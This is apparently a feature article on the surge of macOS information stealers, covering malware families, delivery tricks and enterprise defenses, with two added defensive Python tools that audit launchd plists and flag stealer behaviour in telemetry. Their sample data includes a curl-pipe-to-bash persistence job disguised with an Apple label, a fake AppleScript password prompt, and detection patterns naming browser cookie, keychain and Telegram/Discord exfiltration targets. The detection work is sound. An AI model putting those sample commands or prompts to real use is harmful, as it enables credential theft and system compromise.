Macs No Longer Immune: Inside the Deadly Cyber Crimewave Overtaking Apple’s Ecosystem

By Titiksha Srivastav - Assistant Editor

Long treated as a safer corner of the internet, Apple’s macOS has entered its most perilous phase yet. Between 2024 and 2025, detections of Mac-focused threats, led by information-stealing malware rented “as a service,” spiked sharply, erasing the old assumption that Macs were harder targets. A new criminal economy now blends malvertising, Trojanized apps, and social engineering to lift passwords, wallets, and corporate secrets at scale.

From Niche Platform to Prime Target

For years, Macs’ smaller market share, Unix underpinnings, and Apple’s app controls were seen as natural armor. That perception has collapsed. Security teams tracking endpoint telemetry report a step-change: Mac-specific threats surged through 2024 into 2025, with information stealers driving the curve. The shift reflects fundamentals: more Macs in offices and creative shops, more high-value data sitting behind iCloud accounts and keychains, and a thriving criminal market eager to monetize it.


Crucially, this is not a Windows playbook crudely ported to Macs. Adversaries now design first-class macOS campaigns that understand AppleScript prompts, Gatekeeper flows, Transparency, Consent, and Control (TCC) dialogs, and user habits, particularly the tendency to override warnings when a download looks “familiar enough.” The result is a steady stream of compromises that begin with a single click and end with wide data exposure.

Inside the New Mac Stealers

A commercial crime stack. The defining feature of this wave is the Malware-as-a-Service (MaaS) model, which rents out polished Mac stealers, complete with updates, affiliate dashboards, customer “support,” and turnkey command-and-control. Atomic Stealer (AMOS) became the template: a subscription product that harvests keychain secrets, browser cookies, saved logins, credit cards, crypto wallets, and documents. In mid-2025 it added a persistent backdoor, shifting from smash-and-grab to durable remote access.

AMOS’s close relative, Poseidon, surged later in 2024, quickly grabbing the largest share of Mac stealer activity without displacing AMOS—evidence that the market itself expanded. Other families round out the ecosystem:

  • Cuckoo (Objective-C) blends infostealing with spyware-like audio/video capture and keychain dumps, often hiding behind fake or low-quality utilities and abusing LaunchAgents for persistence.
  • MetaStealer and newer Python-heavy families such as PXA Stealer target a broad set of Chromium/Gecko browsers, file-transfer tools, VPN clients, and dozens of desktop wallets; some route exfiltration through Telegram or Cloudflare-fronted relays to blend with normal traffic.
  • ZuRu pivots to developers, impersonating popular tools (e.g., Termius) and swapping in helper apps that fetch a rich C2 implant capable of recon, file ops, and shell execution.
  • FrigidStealer arrives via fake “update” pages (Safari/Chrome-themed DMGs), while Koi chases wallets and even password-manager extensions.
  • State-aligned kits have entered the scene: NimDoor (attributed to DPRK operators) uses Nim-compiled binaries, AppleScript droppers disguised as “Zoom SDK” updates, process injection, and WebSocket-over-TLS (wss) C2, techniques once rare in macOS malware.

How attacks land. Delivery is sophisticated, but human. The leading paths:

  • Malvertising & SEO poisoning: Look-alike ads and search results for popular Mac software (Homebrew, design tools, remote desktop clients) lead to cloned sites serving trojanized DMGs.
  • Trojanized installers & fake updates: “New version” pop-ups or cloned vendor flows cajole users into bypassing Gatekeeper—notarization gaps persist, and some malware now ships signed to glide past default blocks.
  • Phishing & social engineering: Spear-phish lures (e.g., job tests, copyright “complaints,” Zoom scripts) push victims to run AppleScript droppers or paste Terminal commands. Discord/Teams/Slack are exploited for trust and delivery.
  • Supply chain & PPI services: Typosquatted libraries and pay-per-install networks scale distribution; expired invite links on Discord are quietly re-used to funnel users into malicious servers.

Staying hidden. Families use XOR/string obfuscation, per-build DMG hashes, JXA/AppleScript prompts that mimic macOS dialogs, and stealthy persistence (LaunchAgents/Daemons, login items, cron). More advanced samples inject into benign processes or run filelessly from memory. Several abuse mainstream platforms—Telegram, Discord, Google services—for C2 and data staging, making network detection harder.
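The LaunchAgent/LaunchDaemon persistence described above can be audited offline by parsing the property lists themselves. The following is an added example for this article, not code from it or from any vendor: it loads plist XML with Python’s standard plistlib and flags the patterns the text names (a payload in a user-writable path, an interpreter launched with inline code, a download piped straight into a shell, an Apple-looking label whose program does not live in a system directory, and the hidden-answer AppleScript dialog stealers use to phish the login password). The three sample plists, the heuristic lists and the paths in them are constructed for illustration; on a real host you would feed it the files under /Library/LaunchAgents, /Library/LaunchDaemons and ~/Library/LaunchAgents.

```python
"""Audit launchd plists for the persistence patterns Mac stealers rely on.

Added example for this article, not code from it. Heuristics, paths and the
three sample plists are constructed assumptions; tune them to your fleet.
"""
import plistlib
import re

INTERPRETERS = {"osascript", "bash", "sh", "zsh", "python", "python3", "perl", "ruby"}
INLINE_FLAGS = {"-c", "-e"}  # bash -c, python3 -c, osascript -e: code passed inline, no file to inspect
APPLE_SYSTEM_DIRS = ("/System/", "/usr/", "/Library/Apple/")  # assumption: where genuine com.apple.* jobs live
USER_WRITABLE = re.compile(
    r"/(?:private/)?(?:tmp|var/folders)/|/Users/Shared/|/Users/[^/\s\"']+/(?:Library|Downloads|\.)"
)
FETCH_TO_SHELL = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
HIDDEN_PROMPT = re.compile(r"with hidden answer", re.IGNORECASE)  # AppleScript password dialog


def audit_job(job: dict) -> dict:
    """Score one parsed LaunchAgent/LaunchDaemon dictionary and return a report."""
    args = list(job.get("ProgramArguments") or [])
    program = job.get("Program") or (args[0] if args else "")
    command = " ".join(args) if args else program
    label = job.get("Label", "")
    findings = set()

    if USER_WRITABLE.search(command):
        findings.add("user-writable-path")
    if program.rsplit("/", 1)[-1] in INTERPRETERS and INLINE_FLAGS & set(args):
        findings.add("inline-interpreter")
    if FETCH_TO_SHELL.search(command):
        findings.add("fetch-to-shell")
    if HIDDEN_PROMPT.search(command):
        findings.add("hidden-password-prompt")
    if label.startswith("com.apple.") and not program.startswith(APPLE_SYSTEM_DIRS):
        findings.add("apple-label-nonsystem-program")

    return {
        "label": label,
        "program": program,
        # RunAtLoad/KeepAlive make the job survive reboots and kills, i.e. real persistence.
        "persistent": bool(job.get("RunAtLoad") or job.get("KeepAlive")),
        "findings": sorted(findings),
    }


def audit_plists(blobs: dict) -> list:
    """Parse each plist (keyed by its path) and report on it; a malformed plist is itself a finding."""
    reports = []
    for path, blob in blobs.items():
        try:
            job = plistlib.loads(blob)
        except Exception as exc:  # plistlib raises InvalidFileException / ExpatError on bad input
            reports.append({"path": path, "label": "", "program": "", "persistent": False,
                            "findings": ["unparseable-plist"], "error": str(exc)})
            continue
        report = audit_job(job)
        report["path"] = path
        reports.append(report)
    return reports


# Constructed sample plists (hypothetical labels, hosts and users), not taken from any real system.
SAMPLE_PLISTS = {
    "/Library/LaunchAgents/com.example.updater.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/Applications/Example.app/Contents/MacOS/updater</string><string>--check</string></array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>""",
    "/Library/LaunchDaemons/com.apple.update.agent.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.update.agent</string>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>-c</string>
  <string>curl -fsSL http://update.example.invalid/a.sh | bash</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
    "/Users/alice/Library/LaunchAgents/com.acme.sync.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.acme.sync</string>
  <key>ProgramArguments</key>
  <array><string>/usr/bin/osascript</string>
  <string>-e</string><string>display dialog "macOS needs your password to finish updating." default answer "" with hidden answer</string>
  <string>-e</string><string>do shell script "/Users/alice/Library/Application Support/.cache/agent"</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
}

if __name__ == "__main__":
    for r in audit_plists(SAMPLE_PLISTS):
        status = "FLAG" if r["findings"] else "ok  "
        print(f"{status} {r['path']} persistent={r['persistent']} {', '.join(r['findings'])}")
```

Each finding is a heuristic, not proof of compromise: a legitimate updater can also run `bash -c`, so the value is in stacking findings (an Apple-looking label plus a fetch-to-shell plus RunAtLoad) and in diffing the results against a known-good baseline of the same directories.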

Who’s behind it. The cast spans Russian-speaking syndicates (deep in MaaS, bulletproof hosting and ad infrastructure), DPRK operators (Web3/crypto targeting, high tradecraft), and Chinese APTs with dual espionage/financial motives. Financial crews like traffic sellers and loader operators stitch this economy together, renting distribution and laundering infrastructure.

Defense, Policy, and the Road Ahead

The human layer is the fault line. Apple closed a popular Gatekeeper bypass in macOS Sequoia (the Control-click “Open” override that let a user launch a blocked app in one step), but attackers adapted by sharpening lures and signing more binaries. The reliable pivot remains social engineering: a plausible ad, a familiar brand, a single password prompt. Most successful Mac intrusions still begin with a user decision.

What enterprises can do now:

  • Treat Macs like any other tier-one asset. Deploy modern EDR/XDR with behavior analytics tuned for macOS (rare keychain access, AppleScript execution chains, unusual browser DB reads, cookie/session theft).
  • Harden and reduce attack surface. Enforce least-privilege (standard, not admin, for daily work), lock down AppleScript where feasible, block known-bad ad/typosquat domains via DNS/web filtering, and keep macOS and third-party apps aggressively patched.
  • Constrain software sources. Prefer the Mac App Store or vendor-verified links; discourage “download via search results.” For developers, scrutinize installers and Xcode projects.
  • Train continuously. Simulate malvertising and fake-update lures; teach staff to distrust surprise prompts and to avoid Terminal pastes from unknown sources.
  • Monitor persistence & exfil. Audit LaunchAgents/Daemons and login items; inspect outbound connections to messaging/CDN platforms when paired with suspicious process trees.
  • Plan for compromise. Practice incident playbooks that include keychain credential rotation, TCC reset, cookie/session invalidation, and targeted threat hunting for known Mac stealer TTPs.
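The detection items in the list above (rare keychain access, unusual browser database reads, egress to messaging platforms paired with a suspicious process tree) can be written as rules over endpoint telemetry. The example below is added here and is not code from the article or from any EDR product: it runs four such rules over a small, constructed stream of process, file-read and network events in a hypothetical schema (type, pid, ppid, path, cmdline, host, port stand in for whatever your sensor exports), then correlates hits per process so that messaging-platform egress on its own stays low priority while egress from the same process that just read browser cookies and the login keychain is escalated. The allowlists, bundle paths and sample events are assumptions to be baselined per fleet.

```python
"""Behavioral rules for the macOS stealer TTPs listed above, run over endpoint telemetry.

Added example for this article, not code from it or from any EDR product. The event
schema, allowlists and sample events are constructed assumptions.
"""
import re
from collections import defaultdict

SHELLS = {"sh", "bash", "zsh", "osascript", "python3"}
UNTRUSTED_ROOTS = ("/Volumes/", "/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")
BROWSER_BUNDLES = ("/Applications/Google Chrome.app/", "/Applications/Firefox.app/",
                   "/Applications/Safari.app/", "/Applications/Brave Browser.app/")
# Files that hold cookies and saved logins for Chromium (Cookies, Login Data, Web Data) and Gecko browsers.
BROWSER_SECRET = re.compile(r"/(?:Cookies|Login Data|Web Data|cookies\.sqlite|key4\.db|logins\.json)$")
KEYCHAIN_DB = re.compile(r"/Library/Keychains/[^/]+\.keychain(?:-db)?$")
KEYCHAIN_READERS = ("/usr/bin/security", "/usr/libexec/", "/System/")  # assumption: expected keychain readers
STAGING_HOSTS = {"api.telegram.org", "discord.com", "discordapp.com", "cdn.discordapp.com"}


def detect(events: list) -> list:
    """Apply the four rules to an ordered event stream; returns one alert dict per hit."""
    procs = {}   # pid -> most recent process event, so file/net events can be attributed
    alerts = []

    def alert(rule, pid, detail):
        alerts.append({"rule": rule, "pid": pid,
                       "process": procs.get(pid, {}).get("path", "<unknown>"), "detail": detail})

    for ev in events:
        pid = ev["pid"]
        if ev["type"] == "process":
            procs[pid] = ev
            parent = procs.get(ev.get("ppid"))
            # Rule 1: an app running from a mounted DMG or temp dir spawns a shell/interpreter.
            if parent and parent["path"].startswith(UNTRUSTED_ROOTS) \
                    and ev["path"].rsplit("/", 1)[-1] in SHELLS:
                alert("shell-from-untrusted-volume", pid, f'{parent["path"]} -> {ev["cmdline"]}')
            continue
        ppath = procs.get(pid, {}).get("path", "<unknown>")
        if ev["type"] == "file_read":
            # Rule 2: browser cookie/login DB read by something that is not the browser itself.
            if BROWSER_SECRET.search(ev["path"]) and not ppath.startswith(BROWSER_BUNDLES):
                alert("browser-secret-read-by-nonbrowser", pid, ev["path"])
            # Rule 3: keychain database read by a process outside the expected readers.
            if KEYCHAIN_DB.search(ev["path"]) and not ppath.startswith(KEYCHAIN_READERS):
                alert("keychain-db-read", pid, ev["path"])
        elif ev["type"] == "net":
            # Rule 4: egress to a chat/CDN platform from a binary in an untrusted location.
            if ev["host"] in STAGING_HOSTS and ppath.startswith(UNTRUSTED_ROOTS):
                alert("messaging-egress-from-untrusted-path", pid, f'{ev["host"]}:{ev["port"]}')
    return alerts


def correlate(alerts: list) -> dict:
    """Escalate pids that both touched a credential store and reached a staging platform."""
    by_pid = defaultdict(set)
    for a in alerts:
        by_pid[a["pid"]].add(a["rule"])
    credential = {"browser-secret-read-by-nonbrowser", "keychain-db-read"}
    return {pid: sorted(rules) for pid, rules in by_pid.items()
            if rules & credential and "messaging-egress-from-untrusted-path" in rules}


SAMPLE_EVENTS = [  # constructed telemetry, ordered as a sensor would emit it
    {"type": "process", "pid": 300, "ppid": 1, "cmdline": "Finder",
     "path": "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder"},
    # user double-clicks a trojanized app inside a mounted DMG
    {"type": "process", "pid": 401, "ppid": 300, "cmdline": "Setup",
     "path": "/Volumes/Setup/Setup.app/Contents/MacOS/Setup"},
    {"type": "process", "pid": 402, "ppid": 401, "path": "/bin/bash",
     "cmdline": "bash -c 'chmod +x /tmp/.s && /tmp/.s'"},
    {"type": "file_read", "pid": 401,
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"},
    {"type": "file_read", "pid": 401, "path": "/Users/alice/Library/Keychains/login.keychain-db"},
    {"type": "net", "pid": 401, "host": "api.telegram.org", "port": 443},
    # benign look-alikes that must stay quiet: the browser reads its own cookies, security(1) reads the keychain
    {"type": "process", "pid": 500, "ppid": 300, "cmdline": "Google Chrome",
     "path": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"},
    {"type": "file_read", "pid": 500,
     "path": "/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"},
    {"type": "net", "pid": 500, "host": "discord.com", "port": 443},
    {"type": "process", "pid": 600, "ppid": 300, "path": "/usr/bin/security",
     "cmdline": "security find-generic-password -s wifi"},
    {"type": "file_read", "pid": 600, "path": "/Users/alice/Library/Keychains/login.keychain-db"},
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for a in hits:
        print(f"[{a['rule']}] pid={a['pid']} {a['process']} :: {a['detail']}")
    for pid, rules in correlate(hits).items():
        print(f"ESCALATE pid={pid}: {', '.join(rules)}")
```

Rules 2 and 3 fire on the trojanized installer (pid 401) while the browser and the security tool reading the same files stay silent, and correlate() turns the three single hits on pid 401 into one escalation; the bash child (pid 402) only gets the lower-severity process-tree alert. Code-signing identity (signer and team ID) is the obvious next field to add to the schema, since the text notes that signed and even notarized stealers now exist and a path allowlist alone will not catch them.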

Policy and platform pressure

Apple’s tighter notarization and Gatekeeper checks help, but notarized malware is no longer hypothetical. The harder problems live upstream: advertising supply chains that allow look-alike campaigns, bulletproof hosting that rapidly re-homes C2s, and ubiquitous chat/CDN platforms that blur malicious and legitimate traffic. Progress will hinge on ad-network verification, faster takedown of abusive ASNs, and better ecosystem telemetry sharing between platform vendors and security teams.

The larger story is cultural as much as technical. The “Macs don’t get malware” trope lingers in small firms, creative shops, and even parts of the enterprise. In 2025, that complacency is the vulnerability. The crimeware market has discovered a reliable product-market fit on macOS; reversing the momentum will require enterprises to close the human gaps, and vendors and ad platforms to choke off the distribution rails that made this boom possible.
